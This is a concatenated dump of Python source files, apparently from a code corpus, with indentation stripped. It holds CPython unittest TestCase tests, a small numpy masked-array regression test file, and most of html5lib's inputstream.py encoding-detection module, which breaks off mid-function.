# Failure when no warning is triggered
with self.assertRaises(self.failureException):
self.assertWarnsRegex(RuntimeWarning, "o+",
lambda: 0)
# Failure when another warning is triggered
with warnings.catch_warnings():
# Force default filter (in case tests are run with -We)
warnings.simplefilter("default", RuntimeWarning)
with self.assertRaises(self.failureException):
self.assertWarnsRegex(DeprecationWarning, "o+",
_runtime_warn, "foox")
# Failure when message doesn't match
with self.assertRaises(self.failureException):
self.assertWarnsRegex(RuntimeWarning, "o+",
_runtime_warn, "barz")
# A little trickier: we ask RuntimeWarnings to be raised, and then
# check for some of them. It is implementation-defined whether
# non-matching RuntimeWarnings are simply re-raised, or produce a
# failureException.
with warnings.catch_warnings():
warnings.simplefilter("error", RuntimeWarning)
with self.assertRaises((RuntimeWarning, self.failureException)):
self.assertWarnsRegex(RuntimeWarning, "o+",
_runtime_warn, "barz")
def testAssertWarnsRegexContext(self):
# Same as above, but with assertWarnsRegex as a context manager
def _runtime_warn(msg):
warnings.warn(msg, RuntimeWarning)
_runtime_warn_lineno = inspect.getsourcelines(_runtime_warn)[1]
with self.assertWarnsRegex(RuntimeWarning, "o+") as cm:
_runtime_warn("foox")
self.assertIsInstance(cm.warning, RuntimeWarning)
self.assertEqual(cm.warning.args[0], "foox")
self.assertIn("test_case.py", cm.filename)
self.assertEqual(cm.lineno, _runtime_warn_lineno + 1)
# Failure when no warning is triggered
with self.assertRaises(self.failureException):
with self.assertWarnsRegex(RuntimeWarning, "o+"):
pass
# Failure when another warning is triggered
with warnings.catch_warnings():
# Force default filter (in case tests are run with -We)
warnings.simplefilter("default", RuntimeWarning)
with self.assertRaises(self.failureException):
with self.assertWarnsRegex(DeprecationWarning, "o+"):
_runtime_warn("foox")
# Failure when message doesn't match
with self.assertRaises(self.failureException):
with self.assertWarnsRegex(RuntimeWarning, "o+"):
_runtime_warn("barz")
# A little trickier: we ask RuntimeWarnings to be raised, and then
# check for some of them. It is implementation-defined whether
# non-matching RuntimeWarnings are simply re-raised, or produce a
# failureException.
with warnings.catch_warnings():
warnings.simplefilter("error", RuntimeWarning)
with self.assertRaises((RuntimeWarning, self.failureException)):
with self.assertWarnsRegex(RuntimeWarning, "o+"):
_runtime_warn("barz")
@contextlib.contextmanager
def assertNoStderr(self):
with captured_stderr() as buf:
yield
self.assertEqual(buf.getvalue(), "")
def assertLogRecords(self, records, matches):
self.assertEqual(len(records), len(matches))
for rec, match in zip(records, matches):
self.assertIsInstance(rec, logging.LogRecord)
for k, v in match.items():
self.assertEqual(getattr(rec, k), v)
def testAssertLogsDefaults(self):
# defaults: root logger, level INFO
with self.assertNoStderr():
with self.assertLogs() as cm:
log_foo.info("1")
log_foobar.debug("2")
self.assertEqual(cm.output, ["INFO:foo:1"])
self.assertLogRecords(cm.records, [{'name': 'foo'}])
def testAssertLogsTwoMatchingMessages(self):
# Same, but with two matching log messages
with self.assertNoStderr():
with self.assertLogs() as cm:
log_foo.info("1")
log_foobar.debug("2")
log_quux.warning("3")
self.assertEqual(cm.output, ["INFO:foo:1", "WARNING:quux:3"])
self.assertLogRecords(cm.records,
[{'name': 'foo'}, {'name': 'quux'}])
def checkAssertLogsPerLevel(self, level):
# Check level filtering
with self.assertNoStderr():
with self.assertLogs(level=level) as cm:
log_foo.warning("1")
log_foobar.error("2")
log_quux.critical("3")
self.assertEqual(cm.output, ["ERROR:foo.bar:2", "CRITICAL:quux:3"])
self.assertLogRecords(cm.records,
[{'name': 'foo.bar'}, {'name': 'quux'}])
def testAssertLogsPerLevel(self):
self.checkAssertLogsPerLevel(logging.ERROR)
self.checkAssertLogsPerLevel('ERROR')
def checkAssertLogsPerLogger(self, logger):
# Check per-logger filtering
with self.assertNoStderr():
with self.assertLogs(level='DEBUG') as outer_cm:
with self.assertLogs(logger, level='DEBUG') as cm:
log_foo.info("1")
log_foobar.debug("2")
log_quux.warning("3")
self.assertEqual(cm.output, ["INFO:foo:1", "DEBUG:foo.bar:2"])
self.assertLogRecords(cm.records,
[{'name': 'foo'}, {'name': 'foo.bar'}])
# The outer catchall caught the quux log
self.assertEqual(outer_cm.output, ["WARNING:quux:3"])
def testAssertLogsPerLogger(self):
self.checkAssertLogsPerLogger(logging.getLogger('foo'))
self.checkAssertLogsPerLogger('foo')
def testAssertLogsFailureNoLogs(self):
# Failure due to no logs
with self.assertNoStderr():
with self.assertRaises(self.failureException):
with self.assertLogs():
pass
def testAssertLogsFailureLevelTooHigh(self):
# Failure due to level too high
with self.assertNoStderr():
with self.assertRaises(self.failureException):
with self.assertLogs(level='WARNING'):
log_foo.info("1")
def testAssertLogsFailureMismatchingLogger(self):
# Failure due to mismatching logger (and the logged message is
# passed through)
with self.assertLogs('quux', level='ERROR'):
with self.assertRaises(self.failureException):
with self.assertLogs('foo'):
log_quux.error("1")
def testDeprecatedMethodNames(self):
"""
Test that the deprecated methods raise a DeprecationWarning. See #9424.
"""
old = (
(self.failIfEqual, (3, 5)),
(self.assertNotEquals, (3, 5)),
(self.failUnlessEqual, (3, 3)),
(self.assertEquals, (3, 3)),
(self.failUnlessAlmostEqual, (2.0, 2.0)),
(self.assertAlmostEquals, (2.0, 2.0)),
(self.failIfAlmostEqual, (3.0, 5.0)),
(self.assertNotAlmostEquals, (3.0, 5.0)),
(self.failUnless, (True,)),
(self.assert_, (True,)),
(self.failUnlessRaises, (TypeError, lambda _: 3.14 + 'spam')),
(self.failIf, (False,)),
(self.assertDictContainsSubset, (dict(a=1, b=2), dict(a=1, b=2, c=3))),
(self.assertRaisesRegexp, (KeyError, 'foo', lambda: {}['foo'])),
(self.assertRegexpMatches, ('bar', 'bar')),
)
for meth, args in old:
with self.assertWarns(DeprecationWarning):
meth(*args)
# disable this test for now. When the version where the fail* methods will
# be removed is decided, re-enable it and update the version
def _testDeprecatedFailMethods(self):
"""Test that the deprecated fail* methods get removed in 3.x"""
if sys.version_info[:2] < (3, 3):
return
deprecated_names = [
'failIfEqual', 'failUnlessEqual', 'failUnlessAlmostEqual',
'failIfAlmostEqual', 'failUnless', 'failUnlessRaises', 'failIf',
'assertDictContainsSubset',
]
for deprecated_name in deprecated_names:
with self.assertRaises(AttributeError):
getattr(self, deprecated_name) # remove these in 3.x
def testDeepcopy(self):
# Issue: 5660
class TestableTest(unittest.TestCase):
def testNothing(self):
pass
test = TestableTest('testNothing')
# This shouldn't blow up
deepcopy(test)
def testPickle(self):
# Issue 10326
# Can't use TestCase classes defined in Test class as
# pickle does not work with inner classes
test = unittest.TestCase('run')
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
# blew up prior to fix
pickled_test = pickle.dumps(test, protocol=protocol)
unpickled_test = pickle.loads(pickled_test)
self.assertEqual(test, unpickled_test)
# exercise the TestCase instance in a way that will invoke
# the type equality lookup mechanism
unpickled_test.assertEqual(set(), set())
def testKeyboardInterrupt(self):
def _raise(self=None):
raise KeyboardInterrupt
def nothing(self):
pass
class Test1(unittest.TestCase):
test_something = _raise
class Test2(unittest.TestCase):
setUp = _raise
test_something = nothing
class Test3(unittest.TestCase):
test_something = nothing
tearDown = _raise
class Test4(unittest.TestCase):
def test_something(self):
self.addCleanup(_raise)
for klass in (Test1, Test2, Test3, Test4):
with self.assertRaises(KeyboardInterrupt):
klass('test_something').run()
def testSkippingEverywhere(self):
def _skip(self=None):
raise unittest.SkipTest('some reason')
def nothing(self):
pass
class Test1(unittest.TestCase):
test_something = _skip
class Test2(unittest.TestCase):
setUp = _skip
test_something = nothing
class Test3(unittest.TestCase):
test_something = nothing
tearDown = _skip
class Test4(unittest.TestCase):
def test_something(self):
self.addCleanup(_skip)
for klass in (Test1, Test2, Test3, Test4):
result = unittest.TestResult()
klass('test_something').run(result)
self.assertEqual(len(result.skipped), 1)
self.assertEqual(result.testsRun, 1)
def testSystemExit(self):
def _raise(self=None):
raise SystemExit
def nothing(self):
pass
class Test1(unittest.TestCase):
test_something = _raise
class Test2(unittest.TestCase):
setUp = _raise
test_something = nothing
class Test3(unittest.TestCase):
test_something = nothing
tearDown = _raise
class Test4(unittest.TestCase):
def test_something(self):
self.addCleanup(_raise)
for klass in (Test1, Test2, Test3, Test4):
result = unittest.TestResult()
klass('test_something').run(result)
self.assertEqual(len(result.errors), 1)
self.assertEqual(result.testsRun, 1)
@support.cpython_only
def testNoCycles(self):
case = unittest.TestCase()
wr = weakref.ref(case)
with support.disable_gc():
del case
self.assertFalse(wr())
def test_no_exception_leak(self):
# Issue #19880: TestCase.run() should not keep a reference
# to the exception
class MyException(Exception):
ninstance = 0
def __init__(self):
MyException.ninstance += 1
Exception.__init__(self)
def __del__(self):
MyException.ninstance -= 1
class TestCase(unittest.TestCase):
def test1(self):
raise MyException()
@unittest.expectedFailure
def test2(self):
raise MyException()
for method_name in ('test1', 'test2'):
testcase = TestCase(method_name)
testcase.run()
self.assertEqual(MyException.ninstance, 0)
if __name__ == "__main__":
unittest.main()
| gpl-2.0 |
eusi/MissionPlanerHM | Lib/site-packages/numpy/ma/tests/test_regression.py | 60 | 1082 | from numpy.testing import *
import numpy as np
rlevel = 1
class TestRegression(TestCase):
def test_masked_array_create(self,level=rlevel):
"""Ticket #17"""
x = np.ma.masked_array([0,1,2,3,0,4,5,6],mask=[0,0,0,1,1,1,0,0])
assert_array_equal(np.ma.nonzero(x),[[1,2,6,7]])
def test_masked_array(self,level=rlevel):
"""Ticket #61"""
x = np.ma.array(1,mask=[1])
def test_mem_masked_where(self,level=rlevel):
"""Ticket #62"""
from numpy.ma import masked_where, MaskType
a = np.zeros((1,1))
b = np.zeros(a.shape, MaskType)
c = masked_where(b,a)
a-c
def test_masked_array_multiply(self,level=rlevel):
"""Ticket #254"""
a = np.ma.zeros((4,1))
a[2,0] = np.ma.masked
b = np.zeros((4,2))
a*b
b*a
def test_masked_array_repeat(self, level=rlevel):
"""Ticket #271"""
np.ma.array([1],mask=False).repeat(10)
def test_masked_array_repr_unicode(self):
"""Ticket #1256"""
repr(np.ma.array(u"Unicode"))
| gpl-3.0 |
bheesham/servo | tests/wpt/web-platform-tests/tools/html5lib/html5lib/inputstream.py | 618 | 30855 | from __future__ import absolute_import, division, unicode_literals
from six import text_type
from six.moves import http_client
import codecs
import re
from .constants import EOF, spaceCharacters, asciiLetters, asciiUppercase
from .constants import encodings, ReparseException
from . import utils
from io import StringIO
try:
from io import BytesIO
except ImportError:
BytesIO = StringIO
try:
from io import BufferedIOBase
except ImportError:
class BufferedIOBase(object):
pass
# Non-unicode versions of constants for use in the pre-parser
spaceCharactersBytes = frozenset([item.encode("ascii") for item in spaceCharacters])
asciiLettersBytes = frozenset([item.encode("ascii") for item in asciiLetters])
asciiUppercaseBytes = frozenset([item.encode("ascii") for item in asciiUppercase])
spacesAngleBrackets = spaceCharactersBytes | frozenset([b">", b"<"])
invalid_unicode_re = re.compile("[\u0001-\u0008\u000B\u000E-\u001F\u007F-\u009F\uD800-\uDFFF\uFDD0-\uFDEF\uFFFE\uFFFF\U0001FFFE\U0001FFFF\U0002FFFE\U0002FFFF\U0003FFFE\U0003FFFF\U0004FFFE\U0004FFFF\U0005FFFE\U0005FFFF\U0006FFFE\U0006FFFF\U0007FFFE\U0007FFFF\U0008FFFE\U0008FFFF\U0009FFFE\U0009FFFF\U000AFFFE\U000AFFFF\U000BFFFE\U000BFFFF\U000CFFFE\U000CFFFF\U000DFFFE\U000DFFFF\U000EFFFE\U000EFFFF\U000FFFFE\U000FFFFF\U0010FFFE\U0010FFFF]")
non_bmp_invalid_codepoints = set([0x1FFFE, 0x1FFFF, 0x2FFFE, 0x2FFFF, 0x3FFFE,
0x3FFFF, 0x4FFFE, 0x4FFFF, 0x5FFFE, 0x5FFFF,
0x6FFFE, 0x6FFFF, 0x7FFFE, 0x7FFFF, 0x8FFFE,
0x8FFFF, 0x9FFFE, 0x9FFFF, 0xAFFFE, 0xAFFFF,
0xBFFFE, 0xBFFFF, 0xCFFFE, 0xCFFFF, 0xDFFFE,
0xDFFFF, 0xEFFFE, 0xEFFFF, 0xFFFFE, 0xFFFFF,
0x10FFFE, 0x10FFFF])
ascii_punctuation_re = re.compile("[\u0009-\u000D\u0020-\u002F\u003A-\u0040\u005B-\u0060\u007B-\u007E]")
# Cache for charsUntil()
charsUntilRegEx = {}
class BufferedStream(object):
"""Buffering for streams that do not have buffering of their own
The buffer is implemented as a list of chunks on the assumption that
joining many strings will be slow since it is O(n**2)
"""
def __init__(self, stream):
self.stream = stream
self.buffer = []
self.position = [-1, 0] # chunk number, offset
def tell(self):
pos = 0
for chunk in self.buffer[:self.position[0]]:
pos += len(chunk)
pos += self.position[1]
return pos
def seek(self, pos):
assert pos <= self._bufferedBytes()
offset = pos
i = 0
while len(self.buffer[i]) < offset:
offset -= len(self.buffer[i])
i += 1
self.position = [i, offset]
def read(self, bytes):
if not self.buffer:
return self._readStream(bytes)
elif (self.position[0] == len(self.buffer) and
self.position[1] == len(self.buffer[-1])):
return self._readStream(bytes)
else:
return self._readFromBuffer(bytes)
def _bufferedBytes(self):
return sum([len(item) for item in self.buffer])
def _readStream(self, bytes):
data = self.stream.read(bytes)
self.buffer.append(data)
self.position[0] += 1
self.position[1] = len(data)
return data
def _readFromBuffer(self, bytes):
remainingBytes = bytes
rv = []
bufferIndex = self.position[0]
bufferOffset = self.position[1]
while bufferIndex < len(self.buffer) and remainingBytes != 0:
assert remainingBytes > 0
bufferedData = self.buffer[bufferIndex]
if remainingBytes <= len(bufferedData) - bufferOffset:
bytesToRead = remainingBytes
self.position = [bufferIndex, bufferOffset + bytesToRead]
else:
bytesToRead = len(bufferedData) - bufferOffset
self.position = [bufferIndex, len(bufferedData)]
bufferIndex += 1
rv.append(bufferedData[bufferOffset:bufferOffset + bytesToRead])
remainingBytes -= bytesToRead
bufferOffset = 0
if remainingBytes:
rv.append(self._readStream(remainingBytes))
return b"".join(rv)
def HTMLInputStream(source, encoding=None, parseMeta=True, chardet=True):
if isinstance(source, http_client.HTTPResponse):
# Work around Python bug #20007: read(0) closes the connection.
# http://bugs.python.org/issue20007
isUnicode = False
elif hasattr(source, "read"):
isUnicode = isinstance(source.read(0), text_type)
else:
isUnicode = isinstance(source, text_type)
if isUnicode:
if encoding is not None:
raise TypeError("Cannot explicitly set an encoding with a unicode string")
return HTMLUnicodeInputStream(source)
else:
return HTMLBinaryInputStream(source, encoding, parseMeta, chardet)
class HTMLUnicodeInputStream(object):
"""Provides a unicode stream of characters to the HTMLTokenizer.
This class takes care of character encoding and removing or replacing
incorrect byte-sequences and also provides column and line tracking.
"""
_defaultChunkSize = 10240
def __init__(self, source):
"""Initialises the HTMLInputStream.
HTMLInputStream(source, [encoding]) -> Normalized stream from source
for use by html5lib.
source can be either a file-object, local filename or a string.
The optional encoding parameter must be a string that indicates
the encoding. If specified, that encoding will be used,
regardless of any BOM or later declaration (such as in a meta
element)
parseMeta - Look for a <meta> element containing encoding information
"""
# Craziness
if len("\U0010FFFF") == 1:
self.reportCharacterErrors = self.characterErrorsUCS4
self.replaceCharactersRegexp = re.compile("[\uD800-\uDFFF]")
else:
self.reportCharacterErrors = self.characterErrorsUCS2
self.replaceCharactersRegexp = re.compile("([\uD800-\uDBFF](?![\uDC00-\uDFFF])|(?<![\uD800-\uDBFF])[\uDC00-\uDFFF])")
# List of where new lines occur
self.newLines = [0]
self.charEncoding = ("utf-8", "certain")
self.dataStream = self.openStream(source)
self.reset()
def reset(self):
self.chunk = ""
self.chunkSize = 0
self.chunkOffset = 0
self.errors = []
# number of (complete) lines in previous chunks
self.prevNumLines = 0
# number of columns in the last line of the previous chunk
self.prevNumCols = 0
# Deal with CR LF and surrogates split over chunk boundaries
self._bufferedCharacter = None
def openStream(self, source):
"""Produces a file object from source.
source can be either a file object, local filename or a string.
"""
# Already a file object
if hasattr(source, 'read'):
stream = source
else:
stream = StringIO(source)
return stream
def _position(self, offset):
chunk = self.chunk
nLines = chunk.count('\n', 0, offset)
positionLine = self.prevNumLines + nLines
lastLinePos = chunk.rfind('\n', 0, offset)
if lastLinePos == -1:
positionColumn = self.prevNumCols + offset
else:
positionColumn = offset - (lastLinePos + 1)
return (positionLine, positionColumn)
def position(self):
"""Returns (line, col) of the current position in the stream."""
line, col = self._position(self.chunkOffset)
return (line + 1, col)
def char(self):
""" Read one character from the stream or queue if available. Return
EOF when EOF is reached.
"""
# Read a new chunk from the input stream if necessary
if self.chunkOffset >= self.chunkSize:
if not self.readChunk():
return EOF
chunkOffset = self.chunkOffset
char = self.chunk[chunkOffset]
self.chunkOffset = chunkOffset + 1
return char
def readChunk(self, chunkSize=None):
if chunkSize is None:
chunkSize = self._defaultChunkSize
self.prevNumLines, self.prevNumCols = self._position(self.chunkSize)
self.chunk = ""
self.chunkSize = 0
self.chunkOffset = 0
data = self.dataStream.read(chunkSize)
# Deal with CR LF and surrogates broken across chunks
if self._bufferedCharacter:
data = self._bufferedCharacter + data
self._bufferedCharacter = None
elif not data:
# We have no more data, bye-bye stream
return False
if len(data) > 1:
lastv = ord(data[-1])
if lastv == 0x0D or 0xD800 <= lastv <= 0xDBFF:
self._bufferedCharacter = data[-1]
data = data[:-1]
self.reportCharacterErrors(data)
# Replace invalid characters
# Note U+0000 is dealt with in the tokenizer
data = self.replaceCharactersRegexp.sub("\ufffd", data)
data = data.replace("\r\n", "\n")
data = data.replace("\r", "\n")
self.chunk = data
self.chunkSize = len(data)
return True
def characterErrorsUCS4(self, data):
for i in range(len(invalid_unicode_re.findall(data))):
self.errors.append("invalid-codepoint")
def characterErrorsUCS2(self, data):
# Someone picked the wrong compile option
# You lose
skip = False
for match in invalid_unicode_re.finditer(data):
if skip:
continue
codepoint = ord(match.group())
pos = match.start()
# Pretty sure there should be endianness issues here
if utils.isSurrogatePair(data[pos:pos + 2]):
# We have a surrogate pair!
char_val = utils.surrogatePairToCodepoint(data[pos:pos + 2])
if char_val in non_bmp_invalid_codepoints:
self.errors.append("invalid-codepoint")
skip = True
elif (codepoint >= 0xD800 and codepoint <= 0xDFFF and
pos == len(data) - 1):
self.errors.append("invalid-codepoint")
else:
skip = False
self.errors.append("invalid-codepoint")
def charsUntil(self, characters, opposite=False):
""" Returns a string of characters from the stream up to but not
including any character in 'characters' or EOF. 'characters' must be
a container that supports the 'in' method and iteration over its
characters.
"""
# Use a cache of regexps to find the required characters
try:
chars = charsUntilRegEx[(characters, opposite)]
except KeyError:
if __debug__:
for c in characters:
assert(ord(c) < 128)
regex = "".join(["\\x%02x" % ord(c) for c in characters])
if not opposite:
regex = "^%s" % regex
chars = charsUntilRegEx[(characters, opposite)] = re.compile("[%s]+" % regex)
rv = []
while True:
# Find the longest matching prefix
m = chars.match(self.chunk, self.chunkOffset)
if m is None:
# If nothing matched, and it wasn't because we ran out of chunk,
# then stop
if self.chunkOffset != self.chunkSize:
break
else:
end = m.end()
# If not the whole chunk matched, return everything
# up to the part that didn't match
if end != self.chunkSize:
rv.append(self.chunk[self.chunkOffset:end])
self.chunkOffset = end
break
# If the whole remainder of the chunk matched,
# use it all and read the next chunk
rv.append(self.chunk[self.chunkOffset:])
if not self.readChunk():
# Reached EOF
break
r = "".join(rv)
return r
def unget(self, char):
# Only one character is allowed to be ungotten at once - it must
# be consumed again before any further call to unget
if char is not None:
if self.chunkOffset == 0:
# unget is called quite rarely, so it's a good idea to do
# more work here if it saves a bit of work in the frequently
# called char and charsUntil.
# So, just prepend the ungotten character onto the current
# chunk:
self.chunk = char + self.chunk
self.chunkSize += 1
else:
self.chunkOffset -= 1
assert self.chunk[self.chunkOffset] == char
class HTMLBinaryInputStream(HTMLUnicodeInputStream):
"""Provides a unicode stream of characters to the HTMLTokenizer.
This class takes care of character encoding and removing or replacing
incorrect byte-sequences and also provides column and line tracking.
"""
def __init__(self, source, encoding=None, parseMeta=True, chardet=True):
"""Initialises the HTMLInputStream.
HTMLInputStream(source, [encoding]) -> Normalized stream from source
for use by html5lib.
source can be either a file-object, local filename or a string.
The optional encoding parameter must be a string that indicates
the encoding. If specified, that encoding will be used,
regardless of any BOM or later declaration (such as in a meta
element)
parseMeta - Look for a <meta> element containing encoding information
"""
# Raw Stream - for unicode objects this will encode to utf-8 and set
# self.charEncoding as appropriate
self.rawStream = self.openStream(source)
HTMLUnicodeInputStream.__init__(self, self.rawStream)
self.charEncoding = (codecName(encoding), "certain")
# Encoding Information
# Number of bytes to use when looking for a meta element with
# encoding information
self.numBytesMeta = 512
# Number of bytes to use when using detecting encoding using chardet
self.numBytesChardet = 100
# Encoding to use if no other information can be found
self.defaultEncoding = "windows-1252"
# Detect encoding iff no explicit "transport level" encoding is supplied
if (self.charEncoding[0] is None):
self.charEncoding = self.detectEncoding(parseMeta, chardet)
# Call superclass
self.reset()
def reset(self):
self.dataStream = codecs.getreader(self.charEncoding[0])(self.rawStream,
'replace')
HTMLUnicodeInputStream.reset(self)
def openStream(self, source):
"""Produces a file object from source.
source can be either a file object, local filename or a string.
"""
# Already a file object
if hasattr(source, 'read'):
stream = source
else:
stream = BytesIO(source)
try:
stream.seek(stream.tell())
except:
stream = BufferedStream(stream)
return stream
def detectEncoding(self, parseMeta=True, chardet=True):
# First look for a BOM
# This will also read past the BOM if present
encoding = self.detectBOM()
confidence = "certain"
# If there is no BOM need to look for meta elements with encoding
# information
if encoding is None and parseMeta:
encoding = self.detectEncodingMeta()
confidence = "tentative"
# Guess with chardet, if avaliable
if encoding is None and chardet:
confidence = "tentative"
try:
try:
from charade.universaldetector import UniversalDetector
except ImportError:
from chardet.universaldetector import UniversalDetector
buffers = []
detector = UniversalDetector()
while not detector.done:
buffer = self.rawStream.read(self.numBytesChardet)
assert isinstance(buffer, bytes)
if not buffer:
break
buffers.append(buffer)
detector.feed(buffer)
detector.close()
encoding = detector.result['encoding']
self.rawStream.seek(0)
except ImportError:
pass
# If all else fails use the default encoding
if encoding is None:
confidence = "tentative"
encoding = self.defaultEncoding
# Substitute for equivalent encodings:
encodingSub = {"iso-8859-1": "windows-1252"}
if encoding.lower() in encodingSub:
encoding = encodingSub[encoding.lower()]
return encoding, confidence
def changeEncoding(self, newEncoding):
assert self.charEncoding[1] != "certain"
newEncoding = codecName(newEncoding)
if newEncoding in ("utf-16", "utf-16-be", "utf-16-le"):
newEncoding = "utf-8"
if newEncoding is None:
return
elif newEncoding == self.charEncoding[0]:
self.charEncoding = (self.charEncoding[0], "certain")
else:
self.rawStream.seek(0)
self.reset()
self.charEncoding = (newEncoding, "certain")
raise ReparseException("Encoding changed from %s to %s" % (self.charEncoding[0], newEncoding))
def detectBOM(self):
"""Attempts to detect at BOM at the start of the stream. If
an encoding can be determined from the BOM return the name of the
encoding otherwise return None"""
bomDict = {
codecs.BOM_UTF8: 'utf-8',
codecs.BOM_UTF16_LE: 'utf-16-le', codecs.BOM_UTF16_BE: 'utf-16-be',
codecs.BOM_UTF32_LE: 'utf-32-le', codecs.BOM_UTF32_BE: 'utf-32-be'
}
# Go to beginning of file and read in 4 bytes
string = self.rawStream.read(4)
assert isinstance(string, bytes)
# Try detecting the BOM using bytes from the string
encoding = bomDict.get(string[:3]) # UTF-8
seek = 3
if not encoding:
# Need to detect UTF-32 before UTF-16
encoding = bomDict.get(string) # UTF-32
seek = 4
if not encoding:
encoding = bomDict.get(string[:2]) # UTF-16
seek = 2
# Set the read position past the BOM if one was found, otherwise
# set it to the start of the stream
self.rawStream.seek(encoding and seek or 0)
return encoding
def detectEncodingMeta(self):
"""Report the encoding declared by the meta element
"""
buffer = self.rawStream.read(self.numBytesMeta)
assert isinstance(buffer, bytes)
parser = EncodingParser(buffer)
self.rawStream.seek(0)
encoding = parser.getEncoding()
if encoding in ("utf-16", "utf-16-be", "utf-16-le"):
encoding = "utf-8"
return encoding
class EncodingBytes(bytes):
"""String-like object with an associated position and various extra methods
If the position is ever greater than the string length then an exception is
raised"""
def __new__(self, value):
assert isinstance(value, bytes)
return bytes.__new__(self, value.lower())
def __init__(self, value):
self._position = -1
def __iter__(self):
return self
def __next__(self):
p = self._position = self._position + 1
if p >= len(self):
raise StopIteration
elif p < 0:
raise TypeError
return self[p:p + 1]
def next(self):
# Py2 compat
return self.__next__()
def previous(self):
p = self._position
if p >= len(self):
raise StopIteration
elif p < 0:
raise TypeError
self._position = p = p - 1
return self[p:p + 1]
def setPosition(self, position):
if self._position >= len(self):
raise StopIteration
self._position = position
def getPosition(self):
if self._position >= len(self):
raise StopIteration
if self._position >= 0:
return self._position
else:
return None
position = property(getPosition, setPosition)
def getCurrentByte(self):
return self[self.position:self.position + 1]
currentByte = property(getCurrentByte)
def skip(self, chars=spaceCharactersBytes):
"""Skip past a list of characters"""
p = self.position # use property for the error-checking
while p < len(self):
c = self[p:p + 1]
if c not in chars:
self._position = p
return c
p += 1
self._position = p
return None
def skipUntil(self, chars):
p = self.position
while p < len(self):
c = self[p:p + 1]
if c in chars:
self._position = p
return c
p += 1
self._position = p
return None
def matchBytes(self, bytes):
"""Look for a sequence of bytes at the start of a string. If the bytes
are found return True and advance the position to the byte after the
match. Otherwise return False and leave the position alone"""
p = self.position
data = self[p:p + len(bytes)]
rv = data.startswith(bytes)
if rv:
self.position += len(bytes)
return rv
def jumpTo(self, bytes):
"""Look for the next sequence of bytes matching a given sequence. If
a match is found advance the position to the last byte of the match"""
newPosition = self[self.position:].find(bytes)
if newPosition > -1:
# XXX: This is ugly, but I can't see a nicer way to fix this.
if self._position == -1:
self._position = 0
self._position += (newPosition + len(bytes) - 1)
return True
else:
raise StopIteration
class EncodingParser(object):
"""Mini parser for detecting character encoding from meta elements"""
def __init__(self, data):
"""string - the data to work on for encoding detection"""
self.data = EncodingBytes(data)
self.encoding = None
def getEncoding(self):
methodDispatch = (
(b"<!--", self.handleComment),
(b"<meta", self.handleMeta),
(b"</", self.handlePossibleEndTag),
(b"<!", self.handleOther),
(b"<?", self.handleOther),
(b"<", self.handlePossibleStartTag))
for byte in self.data:
keepParsing = True
for key, method in methodDispatch:
if self.data.matchBytes(key):
try:
keepParsing = method()
break
except StopIteration:
keepParsing = False
break
if not keepParsing:
break
return self.encoding
def handleComment(self):
"""Skip over comments"""
return self.data.jumpTo(b"-->")
def handleMeta(self):
if self.data.currentByte not in spaceCharactersBytes:
# if we have <meta not followed by a space so just keep going
return True
# We have a valid meta element we want to search for attributes
hasPragma = False
pendingEncoding = None
while True:
# Try to find the next attribute after the current position
attr = self.getAttribute()
if attr is None:
return True
else:
if attr[0] == b"http-equiv":
hasPragma = attr[1] == b"content-type"
if hasPragma and pendingEncoding is not None:
self.encoding = pendingEncoding
return False
elif attr[0] == b"charset":
tentativeEncoding = attr[1]
codec = codecName(tentativeEncoding)
if codec is not None:
self.encoding = codec
return False
elif attr[0] == b"content":
contentParser = ContentAttrParser(EncodingBytes(attr[1]))
tentativeEncoding = contentParser.parse()
if tentativeEncoding is not None:
codec = codecName(tentativeEncoding)
if codec is not None:
if hasPragma:
self.encoding = codec
return False
else:
pendingEncoding = codec
def handlePossibleStartTag(self):
return self.handlePossibleTag(False)
def handlePossibleEndTag(self):
next(self.data)
return self.handlePossibleTag(True)
def handlePossibleTag(self, endTag):
data = self.data
if data.currentByte not in asciiLettersBytes:
# If the next byte is not an ascii letter either ignore this
# fragment (possible start tag case) or treat it according to
# handleOther
if endTag:
data.previous()
self.handleOther()
return True
c = data.skipUntil(spacesAngleBrackets)
if c == b"<":
# return to the first step in the overall "two step" algorithm
# reprocessing the < byte
data.previous()
else:
# Read all attributes
attr = self.getAttribute()
while attr is not None:
attr = self.getAttribute()
return True
def handleOther(self):
return self.data.jumpTo(b">")
def getAttribute(self):
"""Return a name,value pair for the next attribute in the stream,
if one is found, or None"""
data = self.data
# Step 1 (skip chars)
c = data.skip(spaceCharactersBytes | frozenset([b"/"]))
assert c is None or len(c) == 1
# Step 2
if c in (b">", None):
return None
# Step 3
attrName = []
attrValue = []
# Step 4 attribute name
while True:
if c == b"=" and attrName:
break
elif c in spaceCharactersBytes:
# Step 6!
c = data.skip()
break
elif c in (b"/", b">"):
return b"".join(attrName), b""
elif c in asciiUppercaseBytes:
attrName.append(c.lower())
elif c is None:
return None
else:
attrName.append(c)
# Step 5
c = next(data)
# Step 7
if c != b"=":
data.previous()
return b"".join(attrName), b""
# Step 8
next(data)
# Step 9
c = data.skip()
# Step 10
if c in (b"'", b'"'):
# 10.1
quoteChar = c
while True:
# 10.2
c = next(data)
# 10.3
if c == quoteChar:
next(data)
return b"".join(attrName), b"".join(attrValue)
# 10.4
elif c in asciiUppercaseBytes:
attrValue.append(c.lower())
# 10.5
else:
attrValue.append(c)
elif c == b">":
return b"".join(attrName), b""
elif c in asciiUppercaseBytes:
attrValue.append(c.lower())
elif c is None:
return None
else:
attrValue.append(c)
# Step 11
while True:
c = next(data)
if c in spacesAngleBrackets:
return b"".join(attrName), b"".join(attrValue)
elif c in asciiUppercaseBytes:
attrValue.append(c.lower())
elif c is None:
return None
else:
attrValue.append(c)
class ContentAttrParser(object):
def __init__(self, data):
assert isinstance(data, bytes)
self.data = data
def parse(self):
try:
# Check if the attr name is charset
# otherwise return
self.data.jumpTo(b"charset")
self.data.position += 1
self.data.skip()
if not self.data.currentByte == b"=":
# If there is no = sign keep looking for attrs
return None
self.data.position += 1
self.data.skip()
# Look for an encoding between matching quote marks
if self.data.currentByte in (b'"', b"'"):
quoteMark = self.data.currentByte
self.data.position += 1
oldPosition = self.data.position
if self.data.jumpTo(quoteMark):
return self.data[oldPosition:self.data.position]
else:
return None
else:
# Unquoted value
oldPosition = self.data.position
try:
self.data.skipUntil(spaceCharactersBytes)
return self.data[oldPosition:self.data.position]
except StopIteration:
# Return the whole remaining value
return self.data[oldPosition:]
except StopIteration:
return None
def codecName(encoding):
"""Return the python codec name corresponding to an encoding or None if the
string doesn't correspond to a valid encoding."""
if isinstance(encoding, bytes):
try:
encoding = encoding.decode("ascii")
